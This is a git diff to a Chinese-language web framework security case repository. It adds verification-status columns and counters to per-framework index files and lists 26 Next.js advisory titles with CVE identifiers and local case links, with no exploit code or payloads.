a/07-framework-security/ecommerce/woocommerce/INDEX.md +++ b/07-framework-security/ecommerce/woocommerce/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -27,6 +31,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/angular/INDEX.md b/07-framework-security/frameworks/angular/INDEX.md index 06b24a30..840b86bf 100644 --- a/07-framework-security/frameworks/angular/INDEX.md +++ b/07-framework-security/frameworks/angular/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/aspnet-core/INDEX.md b/07-framework-security/frameworks/aspnet-core/INDEX.md index 7f363a55..679024f0 100644 --- a/07-framework-security/frameworks/aspnet-core/INDEX.md +++ b/07-framework-security/frameworks/aspnet-core/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -24,6 +28,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/astro/INDEX.md b/07-framework-security/frameworks/astro/INDEX.md index b7db776b..615b336e 100644 --- a/07-framework-security/frameworks/astro/INDEX.md +++ b/07-framework-security/frameworks/astro/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/django/INDEX.md b/07-framework-security/frameworks/django/INDEX.md index 0d2b6599..2b519340 100644 --- a/07-framework-security/frameworks/django/INDEX.md +++ b/07-framework-security/frameworks/django/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/echo/INDEX.md b/07-framework-security/frameworks/echo/INDEX.md index 112c6927..1d5dbc34 100644 --- a/07-framework-security/frameworks/echo/INDEX.md +++ b/07-framework-security/frameworks/echo/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -24,6 +28,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/esbuild/INDEX.md b/07-framework-security/frameworks/esbuild/INDEX.md index d2a7d1ca..4b67b151 100644 --- a/07-framework-security/frameworks/esbuild/INDEX.md +++ b/07-framework-security/frameworks/esbuild/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/express/INDEX.md b/07-framework-security/frameworks/express/INDEX.md index fc9c5fcb..414608e1 100644 --- a/07-framework-security/frameworks/express/INDEX.md +++ b/07-framework-security/frameworks/express/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/fastify/INDEX.md b/07-framework-security/frameworks/fastify/INDEX.md index 4127fc2f..3d4f2d2a 100644 --- a/07-framework-security/frameworks/fastify/INDEX.md +++ b/07-framework-security/frameworks/fastify/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/flask/INDEX.md b/07-framework-security/frameworks/flask/INDEX.md index b762866e..8000fbf7 100644 --- a/07-framework-security/frameworks/flask/INDEX.md +++ b/07-framework-security/frameworks/flask/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/gin/INDEX.md b/07-framework-security/frameworks/gin/INDEX.md index b19abc59..84f060e8 100644 --- a/07-framework-security/frameworks/gin/INDEX.md +++ b/07-framework-security/frameworks/gin/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -24,6 +28,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/hapi/INDEX.md b/07-framework-security/frameworks/hapi/INDEX.md index 9740e236..32e7adab 100644 --- a/07-framework-security/frameworks/hapi/INDEX.md +++ b/07-framework-security/frameworks/hapi/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/koa/INDEX.md b/07-framework-security/frameworks/koa/INDEX.md index 2c8336c3..fef6f858 100644 --- a/07-framework-security/frameworks/koa/INDEX.md +++ b/07-framework-security/frameworks/koa/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/laravel/INDEX.md b/07-framework-security/frameworks/laravel/INDEX.md index eb16d56c..2831f4c4 100644 --- a/07-framework-security/frameworks/laravel/INDEX.md +++ b/07-framework-security/frameworks/laravel/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/nestjs/INDEX.md b/07-framework-security/frameworks/nestjs/INDEX.md index ff794220..279c162a 100644 --- a/07-framework-security/frameworks/nestjs/INDEX.md +++ b/07-framework-security/frameworks/nestjs/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/nextjs/INDEX.md b/07-framework-security/frameworks/nextjs/INDEX.md index 99492dd0..6c785101 100644 --- a/07-framework-security/frameworks/nextjs/INDEX.md +++ b/07-framework-security/frameworks/nextjs/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `26` - 近 30 天新增/更新: `5` - 重点 Markdown 案例数: `26` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `26` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -26,31 +30,31 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components | `low` | `generated` | `official` | `2026-02-13T00:43:52.836085Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md) | -| Next.js has Unbounded Memory Consumption via PPR Resume Endpoint | `low` | `generated` | `official` | `2026-02-06T13:13:43.709252Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md) | -| Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration | `low` | `generated` | `official` | `2026-02-10T01:28:46.973023Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md) | -| Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up | `low` | `generated` | `official` | `2026-02-04T02:46:38.768104Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md) | -| Next Server Actions Source Code Exposure | `low` | `generated` | `official` | `2026-02-04T02:51:40.627151Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md) | -| Next Vulnerable to Denial of Service with Server Components | `low` | `generated` | `official` | `2026-02-04T03:55:54.855562Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md) | -| Next.js is vulnerable to RCE in React flight protocol | `low` | `generated` | `official` | `2026-02-04T03:45:15.823345Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md) | -| Next.js Affected by Cache Key Confusion for Image Optimization API Routes | `low` | `generated` | `official` | `2026-02-04T02:50:08.291668Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md) | -| Next.js Content Injection Vulnerability for Image Optimization | `low` | `generated` | `official` | `2026-02-04T04:35:34.538107Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md) | -| Next.js Improper Middleware Redirect Handling Leads to SSRF | `low` | `generated` | `official` | `2026-02-04T04:20:45.658010Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md) | -| Next.JS vulnerability can lead to DoS via cache poisoning | `low` | `generated` | `official` | `2025-07-03T21:49:52Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md) | -| Next.js has a Cache poisoning vulnerability due to omission of the Vary header | `low` | `generated` | `official` | `2026-02-04T02:37:18.974477Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md) | -| Information exposure in Next.js dev server due to lack of origin verification | `medium` | `generated` | `official` | `2025-06-13T14:41:21Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md) | -| Next.js Race Condition to Cache Poisoning | `low` | `generated` | `official` | `2025-09-26T17:48:29Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md) | -| Next.js may leak x-middleware-subrequest-id to external hosts | `medium` | `generated` | `official` | `2025-10-13T15:35:50Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md) | -| Authorization Bypass in Next.js Middleware | `low` | `generated` | `official` | `2026-03-04T15:06:29.993197Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md) | -| Next.js Allows a Denial of Service (DoS) with Server Actions | `low` | `generated` | `official` | `2026-02-04T04:36:04.252972Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md) | -| Next.js authorization bypass vulnerability | `low` | `generated` | `official` | `2025-09-10T21:12:24Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md) | -| Denial of Service condition in Next.js image optimization | `low` | `generated` | `official` | `2026-02-04T03:25:43.295558Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md) | -| Next.js Cache Poisoning | `low` | `generated` | `official` | `2026-02-04T03:45:33.402195Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md) | -| Next.js Server-Side Request Forgery in Server Actions | `low` | `generated` | `official` | `2026-02-04T03:32:36.434669Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md) | -| Unexpected server crash in Next.js. | `low` | `generated` | `official` | `2026-03-13T22:00:36.554552Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md) | -| XSS in Image Optimization API for Next.js | `low` | `generated` | `official` | `2026-03-13T22:00:20.154452Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md) | -| Open Redirect in Next.js | `low` | `generated` | `official` | `2026-03-13T22:00:08.038285Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md) | -| Open Redirect in Next.js versions | `low` | `generated` | `official` | `2026-03-13T22:14:13.665535Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md) | -| Directory Traversal in Next.js | `low` | `generated` | `official` | `2025-09-26T17:49:56Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md) | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-13T00:43:52.836085Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md) | +| Next.js has Unbounded Memory Consumption via PPR Resume Endpoint | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-06T13:13:43.709252Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md) | +| Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-10T01:28:46.973023Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md) | +| Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:46:38.768104Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md) | +| Next Server Actions Source Code Exposure | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:51:40.627151Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md) | +| Next Vulnerable to Denial of Service with Server Components | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:55:54.855562Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md) | +| Next.js is vulnerable to RCE in React flight protocol | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:45:15.823345Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md) | +| Next.js Affected by Cache Key Confusion for Image Optimization API Routes | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:50:08.291668Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md) | +| Next.js Content Injection Vulnerability for Image Optimization | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:35:34.538107Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md) | +| Next.js Improper Middleware Redirect Handling Leads to SSRF | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:20:45.658010Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md) | +| Next.JS vulnerability can lead to DoS via cache poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-07-03T21:49:52Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md) | +| Next.js has a Cache poisoning vulnerability due to omission of the Vary header | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:37:18.974477Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md) | +| Information exposure in Next.js dev server due to lack of origin verification | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-06-13T14:41:21Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md) | +| Next.js Race Condition to Cache Poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-26T17:48:29Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md) | +| Next.js may leak x-middleware-subrequest-id to external hosts | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-10-13T15:35:50Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md) | +| Authorization Bypass in Next.js Middleware | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-04T15:06:29.993197Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md) | +| Next.js Allows a Denial of Service (DoS) with Server Actions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:36:04.252972Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md) | +| Next.js authorization bypass vulnerability | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-10T21:12:24Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md) | +| Denial of Service condition in Next.js image optimization | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:25:43.295558Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md) | +| Next.js Cache Poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:45:33.402195Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md) | +| Next.js Server-Side Request Forgery in Server Actions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:32:36.434669Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md) | +| Unexpected server crash in Next.js. | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:36.554552Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md) | +| XSS in Image Optimization API for Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:20.154452Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md) | +| Open Redirect in Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:08.038285Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md) | +| Open Redirect in Next.js versions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:14:13.665535Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md) | +| Directory Traversal in Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-26T17:49:56Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md) | diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md index c5775845..50369c2c 100644 --- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md +++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md @@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:14:13.665535Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-x56p # 